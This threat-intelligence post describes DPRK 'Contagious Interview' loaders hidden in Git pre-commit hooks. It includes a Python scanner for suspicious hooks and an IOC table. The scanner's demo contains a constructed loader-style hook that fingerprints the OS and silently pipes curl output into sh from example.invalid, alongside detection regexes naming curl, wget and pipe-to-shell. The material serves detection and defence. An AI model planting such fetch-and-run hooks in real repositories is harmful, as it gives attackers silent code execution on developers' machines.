Lazarus Group Uses Git Hooks To Hide Malware

2026-05-05 OSM

https://opensourcemalware.com/blog/dprk-git-hooks-malware


OpenSourceMalware reports that DPRK Contagious Interview and TaskJacker operators are now hiding a second-stage loader inside Git pre-commit hooks, rather than in the locations seen earlier such as VS Code tasks, package postinstall scripts, or fake font files. The hook fingerprints the host with uname and fetches a platform-specific payload from a path under precommit.vercel.app for macOS, Linux, or a Windows-style Git environment. The technique suits the fake recruiter coding-assessment lure: the hook runs as soon as the candidate commits code, its output is suppressed, and the commit is allowed to complete, so nothing looks wrong. The repositories observed followed the Contagious Interview pattern (crypto or DeFi themes, freshly created GitHub accounts, minimal history, and tasks that require running the project locally), and post-checkout hooks were also observed. Note that files under .git/hooks are not part of the repository content and do not arrive with a clone; the hook has to be planted by something the candidate runs locally, which is why the "run it on your machine" step of the assessment matters.
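A practitioner's first question is how to find such a hook on a workstation or in a CI runner before it fires. The scanner below is an added example, not code from the OpenSourceMalware write-up or from the observed repositories. It walks the active hooks of a working copy (honouring core.hooksPath in .git/config, which is one way a locally executed setup step can redirect hook lookup), skips the .sample stubs Git ships, and flags the behaviours the report describes: OS fingerprinting with uname, a network fetch, piping the result into an interpreter, suppressed output, and an unconditional success exit. The only indicator taken from the page is the domain precommit.vercel.app; the hook bodies embedded in build_demo_repo() are constructed for the demo and use example.invalid, so nothing is fetched or executed.

```python
"""Scan a Git working copy for client-side hooks that behave like the
pre-commit / post-checkout loader described above. Added example; not
the write-up's code. Demo hooks below are constructed, not real samples."""
from __future__ import annotations
import os
import re
import tempfile
from pathlib import Path

# Domain taken from the page's IOC table; everything else is behavioural.
KNOWN_IOC_DOMAINS = ("precommit.vercel.app",)

RULES = [
    ("os-fingerprint", re.compile(r"\buname\b|\$OSTYPE\b|os\.uname\(|platform\.system\(")),
    ("network-fetch", re.compile(
        r"\bcurl\b|\bwget\b|Invoke-WebRequest|\bIWR\b|urllib\.request|\bhttps?://",
        re.IGNORECASE)),
    ("pipe-to-interpreter", re.compile(r"\|\s*(ba|z|da)?sh\b|\|\s*python[23]?\b|\beval\b")),
    ("output-suppressed", re.compile(r">\s*/dev/null|2>&1|\$null\b")),
    ("always-succeeds", re.compile(r"\|\|\s*true\b|^\s*exit\s+0\s*$", re.MULTILINE)),
    ("known-ioc", re.compile("|".join(re.escape(d) for d in KNOWN_IOC_DOMAINS))),
]

# Hooks Git runs on the developer's machine during routine work.
CLIENT_HOOKS = {"pre-commit", "prepare-commit-msg", "commit-msg", "post-commit",
                "post-checkout", "post-merge", "pre-push", "post-rewrite"}

def scan_hook_text(text: str) -> list[str]:
    """Return the label of every rule that matches the hook body."""
    return [label for label, rx in RULES if rx.search(text)]

def risk(labels: list[str]) -> str:
    """Fetch-and-run (or fetch with hidden output) is the loader pattern."""
    s = set(labels)
    if "known-ioc" in s:
        return "high"
    if "network-fetch" in s and ("pipe-to-interpreter" in s or "output-suppressed" in s):
        return "high"
    return "review" if s else "clean"

def hooks_dir(repo: Path) -> Path:
    """Honour core.hooksPath from .git/config; default to .git/hooks."""
    cfg = repo / ".git" / "config"
    if cfg.is_file():
        m = re.search(r"^\s*hooksPath\s*=\s*(.+?)\s*$", cfg.read_text(), re.MULTILINE)
        if m:
            p = Path(m.group(1))
            return p if p.is_absolute() else repo / p
    return repo / ".git" / "hooks"

def scan_repo(repo: Path) -> dict[str, dict]:
    """Scan every active (executable, non-.sample) hook; map name -> findings."""
    results: dict[str, dict] = {}
    d = hooks_dir(repo)
    if not d.is_dir():
        return results
    for f in sorted(d.iterdir()):
        if f.suffix == ".sample" or not f.is_file() or not os.access(f, os.X_OK):
            continue  # Git never runs .sample stubs or non-executable files
        labels = scan_hook_text(f.read_text(errors="replace"))
        results[f.name] = {"labels": labels, "risk": risk(labels),
                           "client_hook": f.name in CLIENT_HOOKS}
    return results

# Constructed hook bodies for the demo. The first mimics the shape the report
# describes (fingerprint, per-OS URL, silent fetch-and-run, commit proceeds);
# it points at example.invalid, not at the real infrastructure.
LOADER_STYLE_HOOK = """#!/bin/sh
case "$(uname -s)" in
  Darwin) u="https://example.invalid/mac" ;;
  Linux)  u="https://example.invalid/linux" ;;
  *)      u="https://example.invalid/win" ;;
esac
curl -fsSL "$u" | sh >/dev/null 2>&1 || true
exit 0
"""
BENIGN_HOOK = """#!/bin/sh
# run the unit tests before pushing
npm test
"""

def build_demo_repo() -> Path:
    """Throwaway .git layout: one loader-style hook, one benign hook, one
    .sample stub that must be ignored. Constructed for the demo."""
    repo = Path(tempfile.mkdtemp(prefix="hookscan-"))
    hooks = repo / ".git" / "hooks"
    hooks.mkdir(parents=True)
    (repo / ".git" / "config").write_text("[core]\n\trepositoryformatversion = 0\n")
    for name, body in (("pre-commit", LOADER_STYLE_HOOK), ("pre-push", BENIGN_HOOK),
                       ("pre-rebase.sample", LOADER_STYLE_HOOK)):
        p = hooks / name
        p.write_text(body)
        p.chmod(0o755)
    return repo

if __name__ == "__main__":
    for name, r in scan_repo(build_demo_repo()).items():
        print(f"{name:12} {r['risk']:7} {' '.join(r['labels'])}")
```

Run it against a real checkout with scan_repo(Path("/path/to/repo")). The rules are deliberately loose (a URL in a comment or a 2>&1 in a lint wrapper will land in "review"); "high" is reserved for a network fetch combined with execution or silenced output, or for the page's known indicator, which is the combination the report attributes to the loader.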

Indicators of Compromise

Type    Value                               First Seen  Last Seen
HASH    3ebd9bb57d155cc7c3353660f54c153…    2026-05-05  2026-05-06
URL     https://precommit.vercel.app/se…    2026-05-05  2026-05-06
URL     https://precommit.vercel.app/se…    2026-05-05  2026-05-06
DOMAIN  precommit.vercel.app                2026-05-05  2026-05-06
URL     https://precommit.vercel.app/se…    2026-05-05  2026-05-06
